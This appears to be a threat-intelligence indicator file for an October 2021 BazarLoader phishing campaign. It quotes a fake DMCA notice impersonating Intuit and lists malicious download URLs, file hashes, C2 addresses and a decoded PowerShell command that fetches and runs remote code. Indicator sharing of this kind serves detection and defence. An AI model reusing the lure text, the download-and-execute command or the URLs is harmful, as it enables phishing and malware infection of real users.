-
Notifications
You must be signed in to change notification settings - Fork 85
/
Copy path2021-10-12 BazarLoader IOCs
76 lines (63 loc) · 3.36 KB
/
2021-10-12 BazarLoader IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
THREAT IDENTIFICATION: BAZARLOADER
SENDERS OBSERVED
MikeManjrekar@intuit.com
DarrellNisianakis@xero.com
EMAIL BODY
name: Mike
email: MikeManjrekar@intuit.com
message: Hello, Your website or a website that your organization hosts
is infringing on a copyright protected images owned by our company
(intuit Inc.). Take a look at this doc with the hyperlinks to our
images you used at <REDACTED> and our earlier publications to
obtain the evidence of our copyrights. Download it right now and check
this out for yourself:
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/bldn3dk3ocnnsm.html?l=448515893949156431
I think you have willfully infringed our legal rights under 17 USC
Section 101 et seq. and can be liable for statutory damages of up to
$150,000 as set forth in Section 504(c)(2) of the Digital Millennium
Copyright Act (”DMCA”) therein. This message is official notice. I
seek the elimination of the infringing materials mentioned above. Take
note as a service provider, the Dmca requires you to eliminate or
deactivate access to the infringing materials upon receipt of this
particular notification letter. If you don't cease the use of the
aforementioned infringing content a law suit will likely be started
against you. I have a strong faith belief that use of the copyrighted
materials mentioned above as presumably infringing is not permitted by
the copyright owner, its agent, or the law. I swear, under consequence
of perjury, that the information in this message is accurate and
hereby affirm that I am authorized to act on behalf of the owner of an
exclusive and legal right that is presumably infringed. Very truly
yours, Mike Manjrekar Legal Officer intuit, Inc. intuit.com 10/12/2021
MALDOC DOWNLOAD URLS
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/bldn3dk3ocnnsm.html?l=448515893949156431
https://avromatka.space/stat03940893/
https://drive.google.com/uc?export=download&id=1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE
https://doc-10-98-docs.googleusercontent.com/docs/securesc/2ar0dsn5neic0p6pas8fg7501voctna3/g33mklg6mtl71v1bs6f3n1fqdg9rffai/1634050425000/18149949529473707775/11794591500722803184Z/1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE?e=download
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/b30vbjcnbemcbe.html?l=092837709920838431
https://avromatka.space/stat03940893/
https://drive.google.com/uc?export=download&id=172mZw8p_wysqnymRoP-herCPb2Mtpx5Y
https://doc-00-98-docs.googleusercontent.com/docs/securesc/2ar0dsn5neic0p6pas8fg7501voctna3/uh8fijcr5b790a2lqk53c580dabfjfo2/1634050500000/18149949529473707775/11794591500722803184Z/172mZw8p_wysqnymRoP-herCPb2Mtpx5Y?e=download
MALDOC FILE HASHES
Stolen Images Evidence.zip
84c6798721f2b282e45c4d84de0af7b6
Stolen Images Evidence.zip
8d1961f161d2d2131edddff5774e776f
Which contains:
Stolen Images Evidence.js
a24bc7dd8834da21dd07a533eb3b7666
Stolen Images Evidence.js
a89c7a5ea31a05bb8e6760e41094da4f
DECODED POWERSHELL COMMANDS FROM THE JAVASCRIPT FILES
IEX (New-Object Net.Webclient).downloadstring("http://polidors.space/333g100/index.php")
BAZARLOADER PAYLOAD DOWNLOAD URLS
http://polidors.space/333g100/index.php
http://polidors.space/333g100/main.php
BAZARLOADER PAYLOAD FILE HASHES
main.php
4a53771b72f8dde21b1c58c74bd8e24d
Renamed to:
KSpmb.dat
4a53771b72f8dde21b1c58c74bd8e24d
BAZARLOADER C2
https://185.217.95.199/data/html/from
https://165.232.78.45/data/html/from